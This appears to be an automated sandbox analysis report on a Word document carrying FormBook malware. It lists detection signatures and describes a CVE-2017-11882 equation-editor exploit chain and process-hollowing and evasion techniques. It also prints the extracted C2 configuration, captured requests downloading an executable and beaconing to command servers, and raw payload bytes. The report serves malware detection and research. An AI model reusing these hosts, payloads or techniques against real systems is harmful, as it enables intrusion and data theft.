Windows Analysis Report P.O-5433ERE.doc

Overview

General Information

Sample Name: P.O-5433ERE.doc
Analysis ID: 528734
MD5: 17ca06000e92058f0d43259b2683537c
SHA1: db453e5125310d209fe04fb0211677d79d25f3ee
SHA256: 3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
Tags: doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.fcusd4.com/op9t/"], "decoy": ["tzjwt261888.com", "top10iecasinos.com", "nurotag.com", "controlparental24.com", "truenettnpasumo1.xyz", "finsits.com", "publicfigure.skin", "natalispharma.com", "brixbol.com", "bal.group", "perfectinteractivemedia.com", "fascialboost.com", "jgcpfb120.com", "grizzlysolutionsllc.net", "wearegardenersusa.com", "rjsarka.com", "shintoku-gsfarm.com", "1oavyx.com", "volunteervabetweenk.com", "tdshawn.com", "bandhancustomer.com", "amyzingskin.com", "sorbetsa.com", "eadbrasil.club", "directnaukri.com", "alltheheads.com", "elbbinandnibble.online", "kaizenswinger.com", "kimberleydawnwallace.com", "zscyyds.xyz", "ecranthermique.com", "mystitched.com", "shophallows.com", "cachondearais.xyz", "flavatdvb.quest", "christendombiblecollege.com", "affordalbehousing.com", "engro-connect.com", "lorticepttoyof2.xyz", "kingslot.bet", "wiseriq.com", "emmaraducanu.tennis", "xn--seebhnegrlitz-pmb9f.com", "perfectstudio.net", "thenewera.icu", "com104940689794.icu", "imaginative-coaching.com", "campdiscount.info", "waggledance.net", "excellglobus.com", "fssqyd.com", "yalesi.net", "aoliutech.com", "replenish.place", "nityammed.com", "stanislauscountyedu.info", "029saxjy.com", "lttcp089.com", "texaszephyr.com", "sloanlakecomedy.com", "axonlang.com", "bhutaan.com", "sevensummitclimbing.com", "wolfenhawk.com"]}
Yara detected FormBook
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Jump to behavior
Document contains Microsoft Equation 3.0 OLE entries
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr Stream path '_1699368849/\x1CompObj' : ...........................F....Microsoft Equation
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: dell-tv.tk
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4x nop then pop edi 5_2_0041566A
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4x nop then pop esi 5_2_004157F9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4x nop then pop edi 7_2_000A566A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4x nop then pop esi 7_2_000A57F9
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.texaszephyr.com
Source: C:\Windows\explorer.exe Domain query: www.bandhancustomer.com
Source: C:\Windows\explorer.exe Domain query: www.publicfigure.skin
Source: C:\Windows\explorer.exe Network Connect: 172.67.184.102 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.volunteervabetweenk.com
Source: C:\Windows\explorer.exe Domain query: www.1oavyx.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.fcusd4.com/op9t/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WKD-ASIE WKD-ASIE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 37.0.9.166 37.0.9.166
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:08:39 GMTContent-Type: application/x-msdownloadContent-Length: 560128Last-Modified: Thu, 25 Nov 2021 01:30:41 GMTConnection: keep-aliveETag: "619ee741-88c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 e5 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 80 08 00 00 0a 00 00 00 00 00 00 16 9f 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 9e 08 00 4f 00 00 00 00 a0 08 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 7f 08 00 00 20 00 00 00 80 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 08 00 00 08 00 00 00 82 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 8a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 9e 08 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b8 21 01 00 03 00 00 00 8c 01 00 06 64 6a 02 00 60 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:10:32 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:10:37 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 17:10:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingcache-control: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b3c7df37c1c4230-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico95
Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438482081.000000000844F000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.453053501.000000000844F000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoICROS~4.LNK
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp0
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpC
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
